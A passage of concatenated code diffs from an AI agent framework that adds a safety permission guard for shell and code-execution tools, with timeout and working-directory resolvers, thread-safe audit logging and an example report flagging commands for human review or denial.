+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "needs_human_review",
+        "risk_level": "medium",
+        "rule_id": "shell.pipeline_review",
+        "evidence": [
+          "command contains a shell pipeline or command chain"
+        ],
+        "recommendation": "Review multi-stage shell commands manually or replace them with a small audited script."
+      },
+      {
+        "decision": "deny",
+        "risk_level": "high",
+        "rule_id": "resource.large_output",
+        "evidence": [
+          "command appears to generate output above the policy limit"
+        ],
+        "recommendation": "Limit output size, write bounded artifacts, or raise the policy limit after review."
+      }
+    ]
+  },
+  {
+    "decision": "needs_human_review",
+    "risk_level": "high",
+    "rule_id": "hostexec.long_session",
+    "evidence": [
+      "hostexec requested background or PTY execution"
+    ],
+    "recommendation": "Require human approval for host PTY/background sessions and ensure timeout, process-group cleanup, and output caps are enforced.",
+    "tool_name": "exec_command",
+    "command": "tail -f app.log",
+    "backend": "hostexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "needs_human_review",
+        "risk_level": "high",
+        "rule_id": "hostexec.long_session",
+        "evidence": [
+          "hostexec requested background or PTY execution"
+        ],
+        "recommendation": "Require human approval for host PTY/background sessions and ensure timeout, process-group cleanup, and output caps are enforced."
+      },
+      {
+        "decision": "needs_human_review",
+        "risk_level": "medium",
+        "rule_id": "process.background",
+        "evidence": [
+          "command may leave a background process behind"
+        ],
+        "recommendation": "Run foreground commands with a bounded timeout, or record the session id and cleanup plan."
+      }
+    ]
+  },
+  {
+    "decision": "needs_human_review",
+    "risk_level": "medium",
+    "rule_id": "codeexec.host_command_bridge",
+    "evidence": [
+      "python code can launch shell commands"
+    ],
+    "recommendation": "Review code that bridges from code execution into shell execution.",
+    "tool_name": "execute_code",
+    "backend": "codeexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "needs_human_review",
+        "risk_level": "medium",
+        "rule_id": "codeexec.host_command_bridge",
+        "evidence": [
+          "python code can launch shell commands"
+        ],
+        "recommendation": "Review code that bridges from code execution into shell execution."
+      }
+    ]
+  }
+]

--- a/examples/tool_safety_guard/tool_safety_report.json
+++ b/examples/tool_safety_guard/tool_safety_report.json
@@ -154,6 +154,15 @@
       },
       {
         "decision": "deny",
+        "risk_level": "high",
+        "rule_id": "shell.intrinsic_unsafe_command",
+        "evidence": [
+          "command \"bash\" is an unsafe shell builtin or re-executing command"
+        ],
+        "recommendation": "Use a directly inspectable command or an audited workspace script."
+      },
+      {
+        "decision": "deny",
         "risk_level": "medium",
         "rule_id": "policy.command_not_allowed",
         "evidence": [

--- a/internal/shellsafe/parser.go
+++ b/internal/shellsafe/parser.go
@@ -97,6 +97,25 @@ func Parse(command string) (*Pipeline, error) {
 	return &Pipeline{Commands: cmds}, nil
 }
 
+// IsImplicitlyDenied reports whether command is a shell wrapper,
+// re-executing command, or stateful builtin that an active shellsafe policy
+// always rejects.
+func IsImplicitlyDenied(command string) bool {
+	base := basenameForGOOS(strings.TrimSpace(command), runtime.GOOS)
+	_, ok := implicitDeny[normalizeName(base, runtime.GOOS)]
+	return ok
+}
+
+// withParser swaps the active parser for the duration of the
+// returned cleanup function and returns the previous parser. It is
+// intended for tests that exercise the Pipeline / Policy layer
+// without exercising the underlying parser implementation.
+func withParser(p commandParser) (restore func()) {
+	prev := parseCommand
+	parseCommand = p
+	return func() { parseCommand = prev }
+}
+
 // implicitDeny is the set of executable names that are always
 // denied whenever a policy is active. Membership cannot be
 // overridden by the user's Allow list: these are command runners,

--- a/internal/shellsafe/parser_test.go
+++ b/internal/shellsafe/parser_test.go
@@ -991,12 +991,6 @@ func TestPreviewList(t *testing.T) {
 	}
 }
 
-func withParser(p commandParser) (restore func()) {
-	prev := parseCommand
-	parseCommand = p
-	return func() { parseCommand = prev }
-}
-
 // TestParser_SeamAllowsReplacement is a contract test for the
 // commandParser seam: it temporarily installs a stub backend,
 // verifies that Parse / Policy.Check route through it, and that

--- a/tool/codeexec/codeexec.go
+++ b/tool/codeexec/codeexec.go
@@ -12,8 +12,10 @@ package codeexec
 import (
 	"context"
 	"encoding/json"
+	"errors"
 	"fmt"
 	"slices"
+	"time"
 
 	"trpc.group/trpc-go/trpc-agent-go/codeexecutor"
 	"trpc.group/trpc-go/trpc-agent-go/tool"
@@ -77,6 +79,43 @@ func NewTool(exec codeexecutor.CodeExecutor, opts ...Option) tool.CallableTool {
 type executeCodeTool struct {
 	executor codeexecutor.CodeExecutor
 	cfg      config
+}
+
+var _ tool.CodeExecPermissionContextResolver = (*executeCodeTool)(nil)
+
+// ResolveCodeExecPermissionContext reports the executor timeout without
+// starting code execution.
+func (t *executeCodeTool) ResolveCodeExecPermissionContext() (
+	tool.ExecPermissionContext, error,
+) {
+	provider, ok := t.executor.(codeexecutor.ExecutionTimeoutProvider)
+	if !ok {
+		return tool.ExecPermissionContext{}, errors.New(
+			"code executor does not report an execution timeout",
+		)
+	}
+	timeout, bounded := provider.CodeExecutionTimeout()
+	if !bounded {
+		return tool.ExecPermissionContext{TimeoutSeconds: -1}, nil
+	}
+	return tool.ExecPermissionContext{
+		TimeoutSeconds: timeoutSecondsCeil(timeout),
+	}, nil
+}
+
+func timeoutSecondsCeil(timeout time.Duration) int {
+	if timeout <= 0 {
+		return 0
+	}
+	seconds := int64(timeout / time.Second)
+	if timeout%time.Second != 0 {
+		seconds++
+	}
+	maxInt := int64(^uint(0) >> 1)
+	if seconds > maxInt {
+		return int(maxInt)
+	}
+	return int(seconds)
 }
 
 // Declaration returns the tool's declaration.

--- a/tool/codeexec/codeexec_test.go
+++ b/tool/codeexec/codeexec_test.go
@@ -13,11 +13,13 @@ import (
 	"encoding/json"
 	"errors"
 	"testing"
+	"time"
 
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
 
 	"trpc.group/trpc-go/trpc-agent-go/codeexecutor"
+	"trpc.group/trpc-go/trpc-agent-go/tool"
 )
 
 // mockCodeExecutor is a mock implementation of codeexecutor.CodeExecutor for testing.
@@ -32,6 +34,16 @@ func (m *mockCodeExecutor) ExecuteCode(_ context.Context, _ codeexecutor.CodeExe
 
 func (m *mockCodeExecutor) CodeBlockDelimiter() codeexecutor.CodeBlockDelimiter {
 	return codeexecutor.CodeBlockDelimiter{Start: "```", End: "```"}
+}
+
+type timeoutCodeExecutor struct {
+	*mockCodeExecutor
+	timeout time.Duration
+	bounded bool
+}
+
+func (e *timeoutCodeExecutor) CodeExecutionTimeout() (time.Duration, bool) {
+	return e.timeout, e.bounded
 }
 
 func TestNewTool(t *testing.T) {
@@ -104,6 +116,40 @@ func TestNewTool(t *testing.T) {
 		assert.Equal(t, []any{"python"}, langSchema.Enum)
 	})
 
+}
+
+func TestExecuteCodeToolResolvesPermissionContext(t *testing.T) {
+	for _, tt := range []struct {
+		name    string
+		timeout time.Duration
+		bounded bool
+		want    int
+	}{
+		{name: "whole seconds", timeout: 5 * time.Second, bounded: true, want: 5},
+		{name: "partial second rounds up", timeout: 1500 * time.Millisecond, bounded: true, want: 2},
+		{name: "immediate timeout", timeout: 0, bounded: true, want: 0},
+		{name: "unbounded timeout", timeout: 0, bounded: false, want: -1},
+	} {
+		t.Run(tt.name, func(t *testing.T) {
+			exec := &timeoutCodeExecutor{
+				mockCodeExecutor: &mockCodeExecutor{},
+				timeout:          tt.timeout,
+				bounded:          tt.bounded,
+			}
+			callable := NewTool(exec, WithName("python_runner"))
+			resolver, ok := callable.(tool.CodeExecPermissionContextResolver)
+			require.True(t, ok)
+			got, err := resolver.ResolveCodeExecPermissionContext()
+			require.NoError(t, err)
+			assert.Equal(t, tt.want, got.TimeoutSeconds)
+		})
+	}
+
+	callable := NewTool(&mockCodeExecutor{})
+	resolver, ok := callable.(tool.CodeExecPermissionContextResolver)
+	require.True(t, ok)
+	_, err := resolver.ResolveCodeExecPermissionContext()
+	require.EqualError(t, err, "code executor does not report an execution timeout")
 }
 
 func TestExecuteCodeTool_Call(t *testing.T) {

--- a/tool/hostexec/hostexec.go
+++ b/tool/hostexec/hostexec.go
@@ -170,6 +170,23 @@ type execCommandTool struct {
 	baseDir string
 }
 
+// ResolveExecPermissionContext resolves arguments exactly as Call does so a
+// permission policy scans the directory and timeout the process will use.
+func (t *execCommandTool) ResolveExecPermissionContext(
+	args []byte,
+) (tool.ExecPermissionContext, error) {
+	var in execInput
+	if err := json.Unmarshal(args, &in); err != nil {
+		return tool.ExecPermissionContext{}, fmt.Errorf("invalid args: %w", err)
+	}
+	workdir, err := resolveWorkdir(in.Workdir, t.baseDir)
+	if err != nil {
+		return tool.ExecPermissionContext{}, err
+	}
+	timeout := resolveExecTimeoutSeconds(in)
+	return tool.ExecPermissionContext{Cwd: workdir, TimeoutSeconds: timeout}, nil
+}
+
 func (t *execCommandTool) Declaration() *tool.Declaration {
 	return &tool.Declaration{
 		Name: toolExecCommand,
@@ -292,7 +309,7 @@ func (t *execCommandTool) Call(
 		return nil, err
 	}
 	yield := firstInt(in.YieldTimeMS, in.YieldMs)
-	timeout := firstInt(in.TimeoutSec, in.TimeoutSecOld)
+	timeout := resolveExecTimeoutSeconds(in)
 
 	res, err := t.mgr.exec(ctx, execParams{
 		Command:    in.Command,
@@ -301,12 +318,19 @@ func (t *execCommandTool) Call(
 		Pty:        firstBool(in.TTY, in.PTY),
 		Background: in.Background,
 		YieldMs:    yield,
-		TimeoutS:   timeout,
+		TimeoutS:   &timeout,
 	})
 	if err != nil {
 		return nil, err
 	}
 	return mapExecResult(res), nil
+}
+
+func resolveExecTimeoutSeconds(in execInput) int {
+	if value := firstInt(in.TimeoutSec, in.TimeoutSecOld); value != nil && *value > 0 {
+		return *value
+	}
+	return DefaultTimeoutSeconds
 }
 
 type writeStdinTool struct {
@@ -639,5 +663,6 @@ func cloneEnvMap(env map[string]string) map[string]string {
 
 var _ tool.ToolSet = (*toolSet)(nil)
 var _ tool.CallableTool = (*execCommandTool)(nil)
+var _ tool.ExecPermissionContextResolver = (*execCommandTool)(nil)
 var _ tool.CallableTool = (*writeStdinTool)(nil)
 var _ tool.CallableTool = (*killSessionTool)(nil)

--- a/tool/hostexec/manager.go
+++ b/tool/hostexec/manager.go
@@ -23,8 +23,11 @@ import (
 )
 
 const (
+	// DefaultTimeoutSeconds is used when timeout_sec is omitted or non-positive.
+	DefaultTimeoutSeconds = 1_800
+
 	defaultYieldMS    = 10_000
-	defaultTimeoutS   = 1_800
+	defaultTimeoutS   = DefaultTimeoutSeconds
 	defaultLogTail    = 40
 	defaultMaxLines   = 20_000
 	defaultJobTTL     = 30 * time.Minute

--- a/tool/permission.go
+++ b/tool/permission.go
@@ -95,6 +95,19 @@ type PermissionRequest struct {
 	Metadata ToolMetadata
 }
 
+// ExecPermissionContext is the executor-resolved context that a permission
+// policy must inspect before allowing an exec-like tool call.
+type ExecPermissionContext struct {
+	Cwd            string
+	TimeoutSeconds int
+}
+
+// ExecPermissionContextResolver exposes the same cwd and timeout resolution
+// used by an exec-like tool without starting the command.
+type ExecPermissionContextResolver interface {
+	ResolveExecPermissionContext(args []byte) (ExecPermissionContext, error)
+}
+
 // PermissionChecker is implemented by tools that need to enforce their own
 // non-negotiable permission rule before execution.
 type PermissionChecker interface {

--- a/tool/permission.go
+++ b/tool/permission.go
@@ -98,7 +98,9 @@ type PermissionRequest struct {
 // ExecPermissionContext is the executor-resolved context that a permission
 // policy must inspect before allowing an exec-like tool call.
 type ExecPermissionContext struct {
-	Cwd            string
+	Cwd string
+	// TimeoutSeconds is the effective timeout rounded up to whole seconds.
+	// A negative value means that execution has no finite timeout.
 	TimeoutSeconds int
 }
 
@@ -106,6 +108,14 @@ type ExecPermissionContext struct {
 // used by an exec-like tool without starting the command.
 type ExecPermissionContextResolver interface {
 	ResolveExecPermissionContext(args []byte) (ExecPermissionContext, error)
+}
+
+// CodeExecPermissionContextResolver identifies a code-execution tool and
+// exposes the executor-resolved timeout that a permission policy must inspect
+// before allowing code to run. It returns a negative TimeoutSeconds when the
+// executor has no finite timeout.
+type CodeExecPermissionContextResolver interface {
+	ResolveCodeExecPermissionContext() (ExecPermissionContext, error)
 }
 
 // PermissionChecker is implemented by tools that need to enforce their own

--- a/tool/safety/permission.go
+++ b/tool/safety/permission.go
@@ -14,6 +14,7 @@ import (
 	"fmt"
 	"io"
 	"strings"
+	"sync"
 
 	"trpc.group/trpc-go/trpc-agent-go/tool"
 )
@@ -33,6 +34,7 @@ type PermissionPolicy struct {
 	policy         Policy
 	auditPath      string
 	audit          io.Writer
+	auditMu        sync.Mutex
 	requestParsers map[string]PermissionRequestParser
 }
 
@@ -98,7 +100,7 @@ func (p *PermissionPolicy) CheckToolPermission(
 	}
 	report := Scan(scanReq, p.policy)
 	if err := p.writeAudit(report); err != nil {
-		return tool.PermissionDecision{}, err
+		return tool.DenyPermission("tool safety audit failed"), err
 	}
 	switch report.Decision {
 	case DecisionAllow:
@@ -130,6 +132,8 @@ func (p *PermissionPolicy) requestFromExtension(
 }
 
 func (p *PermissionPolicy) writeAudit(report Report) error {
+	p.auditMu.Lock()
+	defer p.auditMu.Unlock()
 	if p.audit != nil {
 		if err := WriteAuditJSONL(p.audit, report); err != nil {
 			return err

--- a/tool/safety/permission.go
+++ b/tool/safety/permission.go
@@ -25,6 +25,8 @@ type PermissionOption func(*PermissionPolicy)
 // PermissionRequestParser converts a framework permission request into a
 // safety scan request. Extensions can use one for MCP, Skill, or custom
 // command-execution tools whose arguments do not match a built-in backend.
+// A parser may set Request.MaxOutputBytes when its executor enforces that cap;
+// the built-in adapters do not expose a byte-cap argument.
 type PermissionRequestParser func(
 	req *tool.PermissionRequest,
 ) (Request, bool, error)

--- a/tool/safety/permission.go
+++ b/tool/safety/permission.go
@@ -1,0 +1,291 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"io"
+	"strings"
+
+	"trpc.group/trpc-go/trpc-agent-go/tool"
+)
+
+// PermissionOption configures the PermissionPolicy wrapper.
+type PermissionOption func(*PermissionPolicy)
+
+// PermissionRequestParser converts a framework permission request into a
+// safety scan request. Extensions can use one for MCP, Skill, or custom
+// command-execution tools whose arguments do not match a built-in backend.
+type PermissionRequestParser func(
+	req *tool.PermissionRequest,
+) (Request, bool, error)
+
+// PermissionPolicy scans command-like tools before they execute.
+type PermissionPolicy struct {
+	policy         Policy
+	auditPath      string
+	audit          io.Writer
+	requestParsers map[string]PermissionRequestParser
+}
+
+// NewPermissionPolicy returns a tool.PermissionPolicy that maps safety scan
+// decisions onto the framework allow / deny / ask actions.
+func NewPermissionPolicy(policy Policy, opts ...PermissionOption) *PermissionPolicy {
+	p := &PermissionPolicy{
+		policy:         policy.withDefaults(),
+		requestParsers: make(map[string]PermissionRequestParser),
+	}
+	for _, opt := range opts {
+		if opt != nil {
+			opt(p)
+		}
+	}
+	return p
+}
+
+// WithAuditPath appends one JSONL audit event per scan to path.
+func WithAuditPath(path string) PermissionOption {
+	return func(p *PermissionPolicy) { p.auditPath = path }
+}
+
+// WithAuditWriter writes one JSONL audit event per scan to w.
+func WithAuditWriter(w io.Writer) PermissionOption {
+	return func(p *PermissionPolicy) { p.audit = w }
+}
+
+// WithPermissionRequestParser registers a parser for an additional tool name.
+// Built-in workspace_exec, exec_command, and execute_code parsing takes
+// precedence. A nil parser or blank tool name is ignored.
+func WithPermissionRequestParser(
+	toolName string,
+	parser PermissionRequestParser,
+) PermissionOption {
+	return func(p *PermissionPolicy) {
+		toolName = strings.TrimSpace(toolName)
+		if toolName == "" || parser == nil {
+			return
+		}
+		p.requestParsers[toolName] = parser
+	}
+}
+
+// CheckToolPermission implements tool.PermissionPolicy.
+func (p *PermissionPolicy) CheckToolPermission(
+	ctx context.Context,
+	req *tool.PermissionRequest,
+) (tool.PermissionDecision, error) {
+	_ = ctx
+	if p == nil {
+		return tool.DenyPermission("tool safety guard permission policy is nil"), nil
+	}
+	scanReq, ok, err := RequestFromPermissionRequest(req)
+	if err == nil && !ok {
+		scanReq, ok, err = p.requestFromExtension(req)
+	}
+	if err != nil {
+		return tool.DenyPermission(err.Error()), nil
+	}
+	if !ok {
+		return tool.AllowPermission(), nil
+	}
+	report := Scan(scanReq, p.policy)
+	if err := p.writeAudit(report); err != nil {
+		return tool.PermissionDecision{}, err
+	}
+	switch report.Decision {
+	case DecisionAllow:
+		return tool.AllowPermission(), nil
+	case DecisionDeny:
+		return tool.DenyPermission(permissionReason(report)), nil
+	case DecisionAsk, DecisionNeedsHumanReview:
+		return tool.AskPermission(permissionReason(report)), nil
+	default:
+		return tool.DenyPermission("tool safety guard returned an unknown decision"), nil
+	}
+}
+
+func (p *PermissionPolicy) requestFromExtension(
+	req *tool.PermissionRequest,
+) (Request, bool, error) {
+	if req == nil {
+		return Request{}, false, nil
+	}
+	toolName := req.ToolName
+	if toolName == "" && req.Declaration != nil {
+		toolName = req.Declaration.Name
+	}
+	parser := p.requestParsers[toolName]
+	if parser == nil {
+		return Request{}, false, nil
+	}
+	return parser(req)
+}
+
+func (p *PermissionPolicy) writeAudit(report Report) error {
+	if p.audit != nil {
+		if err := WriteAuditJSONL(p.audit, report); err != nil {
+			return err
+		}
+	}
+	return AppendAuditFile(p.auditPath, report)
+}
+
+func permissionReason(report Report) string {
+	if len(report.Evidence) == 0 {
+		return fmt.Sprintf(
+			"tool safety guard %s: %s",
+			report.Decision, report.Recommendation)
+	}
+	return fmt.Sprintf(
+		"tool safety guard %s (%s/%s): %s; %s",
+		report.Decision, report.RiskLevel, report.RuleID,
+		strings.Join(report.Evidence, "; "), report.Recommendation)
+}
+
+// RequestFromPermissionRequest extracts command/code execution inputs from a
+// framework permission request.
+func RequestFromPermissionRequest(
+	req *tool.PermissionRequest,
+) (Request, bool, error) {
+	if req == nil {
+		return Request{}, false, nil
+	}
+	toolName := req.ToolName
+	if toolName == "" && req.Declaration != nil {
+		toolName = req.Declaration.Name
+	}
+	if toolName == "" {
+		return Request{}, false, nil
+	}
+	base := Request{
+		ToolName: toolName,
+		Metadata: ToolMetadata{
+			ReadOnly:        req.Metadata.ReadOnly,
+			Destructive:     req.Metadata.Destructive,
+			ConcurrencySafe: req.Metadata.ConcurrencySafe,
+			SearchOrRead:    req.Metadata.SearchOrRead,
+			OpenWorld:       req.Metadata.OpenWorld,
+			MaxResultSize:   req.Metadata.MaxResultSize,
+		},
+	}
+	switch toolName {
+	case "workspace_exec":
+		return parseExecLikeArgs(base, req.Arguments, BackendWorkspaceExec, "cwd")
+	case "exec_command":
+		return parseExecLikeArgs(base, req.Arguments, BackendHostExec, "workdir")
+	case "execute_code":
+		return parseCodeExecArgs(base, req.Arguments)
+	default:
+		return Request{}, false, nil
+	}
+}
+
+type execLikeArgs struct {
+	Command       string            `json:"command"`
+	Cwd           string            `json:"cwd"`
+	Workdir       string            `json:"workdir"`
+	Env           map[string]string `json:"env"`
+	Background    bool              `json:"background"`
+	Timeout       int               `json:"timeout"`
+	TimeoutSec    *int              `json:"timeout_sec"`
+	TimeoutSecOld *int              `json:"timeoutSec"`
+	TTY           *bool             `json:"tty"`
+	PTY           *bool             `json:"pty"`
+}
+
+func parseExecLikeArgs(
+	base Request,
+	args []byte,
+	backend string,
+	cwdField string,
+) (Request, bool, error) {
+	var in execLikeArgs
+	if err := json.Unmarshal(args, &in); err != nil {
+		return Request{}, false, fmt.Errorf("tool safety guard: invalid args: %w", err)
+	}
+	timeout := in.Timeout
+	if timeout <= 0 {
+		if in.TimeoutSec != nil {
+			timeout = *in.TimeoutSec
+		} else if in.TimeoutSecOld != nil {
+			timeout = *in.TimeoutSecOld
+		}
+	}
+	cwd := in.Cwd
+	if cwdField == "workdir" {
+		cwd = in.Workdir
+	}
+	base.Command = in.Command
+	base.Cwd = cwd
+	base.Env = in.Env
+	base.Backend = backend
+	base.TimeoutSeconds = timeout
+	base.Background = in.Background
+	base.TTY = boolValue(in.TTY) || boolValue(in.PTY)
+	return base, true, nil
+}
+
+type codeExecArgs struct {
+	CodeBlocks json.RawMessage `json:"code_blocks"`
+}
+
+func parseCodeExecArgs(base Request, args []byte) (Request, bool, error) {
+	var in codeExecArgs
+	if err := json.Unmarshal(args, &in); err != nil {
+		return Request{}, false, fmt.Errorf("tool safety guard: invalid args: %w", err)
+	}
+	blocks, err := parseCodeBlocks(in.CodeBlocks)
+	if err != nil {
+		return Request{}, false, err
+	}
+	if len(blocks) == 0 {
+		return Request{}, false, nil
+	}
+	base.Backend = BackendCodeExec
+	base.CodeBlocks = blocks
+	return base, true, nil
+}
+
+func parseCodeBlocks(raw json.RawMessage) ([]CodeBlock, error) {
+	if len(raw) == 0 || strings.EqualFold(strings.TrimSpace(string(raw)), "null") {
+		return nil, nil
+	}
+	var val any
+	if err := json.Unmarshal(raw, &val); err != nil {
+		return nil, fmt.Errorf("tool safety guard: invalid code_blocks: %w", err)
+	}
+	if s, ok := val.(string); ok {
+		raw = json.RawMessage(s)
+		if err := json.Unmarshal(raw, &val); err != nil {
+			return nil, fmt.Errorf("tool safety guard: invalid code_blocks: %w", err)
+		}
+	}
+	switch val.(type) {
+	case []any:
+		var blocks []CodeBlock
+		if err := json.Unmarshal(raw, &blocks); err != nil {
+			return nil, err
+		}
+		return blocks, nil
+	case map[string]any:
+		var block CodeBlock
+		if err := json.Unmarshal(raw, &block); err != nil {
+			return nil, err
+		}
+		return []CodeBlock{block}, nil
+	default:
+		return nil, fmt.Errorf("tool safety guard: code_blocks must be array, object, or string")
+	}
+}
+
+func boolValue(v *bool) bool {
+	return v != nil && *v
+}

--- a/tool/safety/permission.go
+++ b/tool/safety/permission.go
@@ -16,6 +16,7 @@ import (
 	"strings"
 	"sync"
 
+	itool "trpc.group/trpc-go/trpc-agent-go/internal/tool"
 	"trpc.group/trpc-go/trpc-agent-go/tool"
 )
 
@@ -90,10 +91,7 @@ func (p *PermissionPolicy) CheckToolPermission(
 	if p == nil {
 		return tool.DenyPermission("tool safety guard permission policy is nil"), nil
 	}
-	scanReq, ok, err := RequestFromPermissionRequest(req)
-	if err == nil && !ok {
-		scanReq, ok, err = p.requestFromExtension(req)
-	}
+	scanReq, ok, err := p.scanRequest(req)
 	if err != nil {
 		return tool.DenyPermission(err.Error()), nil
 	}
@@ -114,6 +112,24 @@ func (p *PermissionPolicy) CheckToolPermission(
 	default:
 		return tool.DenyPermission("tool safety guard returned an unknown decision"), nil
 	}
+}
+
+// scanRequest resolves a permission request into a scan request. An exact
+// built-in name keeps its documented precedence, a parser registered for that
+// exact name comes next, and wrapper resolution runs last so that a registered
+// parser still wins for a name the framework only decorated.
+func (p *PermissionPolicy) scanRequest(
+	req *tool.PermissionRequest,
+) (Request, bool, error) {
+	scanReq, ok, err := requestFromPermission(req, false)
+	if ok || err != nil {
+		return scanReq, ok, err
+	}
+	scanReq, ok, err = p.requestFromExtension(req)
+	if ok || err != nil {
+		return scanReq, ok, err
+	}
+	return requestFromPermission(req, true)
 }
 
 func (p *PermissionPolicy) requestFromExtension(
@@ -158,8 +174,19 @@ func permissionReason(report Report) string {
 
 // RequestFromPermissionRequest extracts command/code execution inputs from a
 // framework permission request.
+//
+// Built-in executors are identified by the model-visible name and, when the
+// framework decorated the tool, by the declaration of the semantic tool behind
+// the wrapper. Reports keep the model-visible name.
 func RequestFromPermissionRequest(
 	req *tool.PermissionRequest,
+) (Request, bool, error) {
+	return requestFromPermission(req, true)
+}
+
+func requestFromPermission(
+	req *tool.PermissionRequest,
+	resolveWrappers bool,
 ) (Request, bool, error) {
 	if req == nil {
 		return Request{}, false, nil
@@ -171,46 +198,97 @@ func RequestFromPermissionRequest(
 	if toolName == "" {
 		return Request{}, false, nil
 	}
-	base := Request{
-		ToolName: toolName,
-		Metadata: ToolMetadata{
-			ReadOnly:        req.Metadata.ReadOnly,
-			Destructive:     req.Metadata.Destructive,
-			ConcurrencySafe: req.Metadata.ConcurrencySafe,
-			SearchOrRead:    req.Metadata.SearchOrRead,
-			OpenWorld:       req.Metadata.OpenWorld,
-			MaxResultSize:   req.Metadata.MaxResultSize,
-		},
+	builtin, execTool := resolveBuiltinExecTool(req, resolveWrappers)
+	if builtin == "" {
+		return Request{}, false, nil
 	}
-	switch toolName {
-	case "workspace_exec":
+	base := Request{ToolName: toolName, Metadata: req.Metadata}
+	switch builtin {
+	case builtinWorkspaceExec:
 		return parseExecLikeArgs(
-			base, req.Arguments, BackendWorkspaceExec, "cwd", req.Tool,
+			base, req.Arguments, BackendWorkspaceExec, "cwd", execTool,
 		)
-	case "exec_command":
+	case builtinExecCommand:
 		return parseExecLikeArgs(
-			base, req.Arguments, BackendHostExec, "workdir", req.Tool,
+			base, req.Arguments, BackendHostExec, "workdir", execTool,
 		)
-	case "write_stdin", "workspace_write_stdin":
-		return parseWriteStdinArgs(base, req.Arguments, toolName)
-	case "execute_code":
+	case builtinWriteStdin, builtinWorkspaceWriteStdin:
+		return parseWriteStdinArgs(base, req.Arguments, builtin)
+	case builtinExecuteCode:
 		return parseCodeExecArgs(base, req.Arguments)
 	default:
 		return Request{}, false, nil
 	}
 }
 
+// Built-in executor tool names parsed natively by the guard.
+const (
+	builtinWorkspaceExec       = "workspace_exec"
+	builtinExecCommand         = "exec_command"
+	builtinWriteStdin          = "write_stdin"
+	builtinWorkspaceWriteStdin = "workspace_write_stdin"
+	builtinExecuteCode         = "execute_code"
+)
+
+var builtinExecToolNames = map[string]struct{}{
+	builtinWorkspaceExec:       {},
+	builtinExecCommand:         {},
+	builtinWriteStdin:          {},
+	builtinWorkspaceWriteStdin: {},
+	builtinExecuteCode:         {},
+}
+
+// resolveBuiltinExecTool identifies the built-in executor behind a permission
+// request and returns the tool to use for capability lookups.
+//
+// A ToolSet member is exposed with the set name prefixed, so hostexec.NewToolSet
+// is called as hostexec_exec_command, and the wrapper also hides capability
+// interfaces such as tool.ExecPermissionContextResolver. Classification
+// therefore falls back to the declaration of the semantic tool, and capability
+// lookups use that unwrapped tool.
+func resolveBuiltinExecTool(
+	req *tool.PermissionRequest,
+	resolveWrappers bool,
+) (string, tool.Tool) {
+	if _, ok := builtinExecToolNames[req.ToolName]; ok {
+		return req.ToolName, itool.ResolveSemantic(req.Tool)
+	}
+	if req.Declaration != nil {
+		if _, ok := builtinExecToolNames[req.Declaration.Name]; ok {
+			return req.Declaration.Name, itool.ResolveSemantic(req.Tool)
+		}
+	}
+	if !resolveWrappers {
+		return "", nil
+	}
+	semantic := itool.ResolveSemantic(req.Tool)
+	if semantic == nil {
+		return "", nil
+	}
+	decl := semantic.Declaration()
+	if decl == nil {
+		return "", nil
+	}
+	if _, ok := builtinExecToolNames[decl.Name]; ok {
+		return decl.Name, semantic
+	}
+	return "", nil
+}
+
 type execLikeArgs struct {
-	Command       string            `json:"command"`
-	Cwd           string            `json:"cwd"`
-	Workdir       string            `json:"workdir"`
-	Env           map[string]string `json:"env"`
-	Background    bool              `json:"background"`
-	Timeout       int               `json:"timeout"`
-	TimeoutSec    *int              `json:"timeout_sec"`
-	TimeoutSecOld *int              `json:"timeoutSec"`
-	TTY           *bool             `json:"tty"`
-	PTY           *bool             `json:"pty"`
+	Command string            `json:"command"`
+	Cwd     string            `json:"cwd"`
+	Workdir string            `json:"workdir"`
+	Env     map[string]string `json:"env"`
+	// Stdin is forwarded verbatim to the spawned process by workspace_exec.
+	// hostexec's exec_command has no such argument and ignores the field.
+	Stdin         string `json:"stdin"`
+	Background    bool   `json:"background"`
+	Timeout       int    `json:"timeout"`
+	TimeoutSec    *int   `json:"timeout_sec"`
+	TimeoutSecOld *int   `json:"timeoutSec"`
+	TTY           *bool  `json:"tty"`
+	PTY           *bool  `json:"pty"`
 }
 
 func parseExecLikeArgs(
@@ -254,6 +332,12 @@ func parseExecLikeArgs(
 	base.TimeoutSeconds = timeout
 	base.Background = in.Background
 	base.TTY = boolValue(in.TTY) || boolValue(in.PTY)
+	if backend == BackendWorkspaceExec {
+		// Only workspace_exec forwards initial stdin to the process, so the
+		// scan mirrors that executor rather than flagging a field hostexec
+		// silently drops.
+		base.Stdin = in.Stdin
+	}
 	return base, true, nil
 }
 

--- a/tool/safety/permission.go
+++ b/tool/safety/permission.go
@@ -11,6 +11,7 @@ package safety
 import (
 	"context"
 	"encoding/json"
+	"errors"
 	"fmt"
 	"io"
 	"strings"
@@ -280,7 +281,7 @@ func requestFromPermission(
 	case builtinWriteStdin, builtinWorkspaceWriteStdin:
 		return parseWriteStdinArgs(base, req.Arguments, builtin)
 	case builtinExecuteCode:
-		return parseCodeExecArgs(base, req.Arguments)
+		return parseCodeExecArgs(base, req.Arguments, execTool)
 	default:
 		return Request{}, false, nil
 	}
@@ -329,6 +330,9 @@ func resolveBuiltinExecTool(
 	semantic := itool.ResolveSemantic(req.Tool)
 	if semantic == nil {
 		return "", nil
+	}
+	if _, ok := semantic.(tool.CodeExecPermissionContextResolver); ok {
+		return builtinExecuteCode, semantic
 	}
 	decl := semantic.Declaration()
 	if decl == nil {
@@ -438,7 +442,11 @@ type codeExecArgs struct {
 	CodeBlocks json.RawMessage `json:"code_blocks"`
 }
 
-func parseCodeExecArgs(base Request, args []byte) (Request, bool, error) {
+func parseCodeExecArgs(
+	base Request,
+	args []byte,
+	execTool tool.Tool,
+) (Request, bool, error) {
 	var in codeExecArgs
 	if err := json.Unmarshal(args, &in); err != nil {
 		return Request{}, false, fmt.Errorf("tool safety guard: invalid args: %w", err)
@@ -449,6 +457,21 @@ func parseCodeExecArgs(base Request, args []byte) (Request, bool, error) {
 	}
 	if len(blocks) == 0 {
 		return Request{}, false, nil
+	}
+	if execTool != nil {
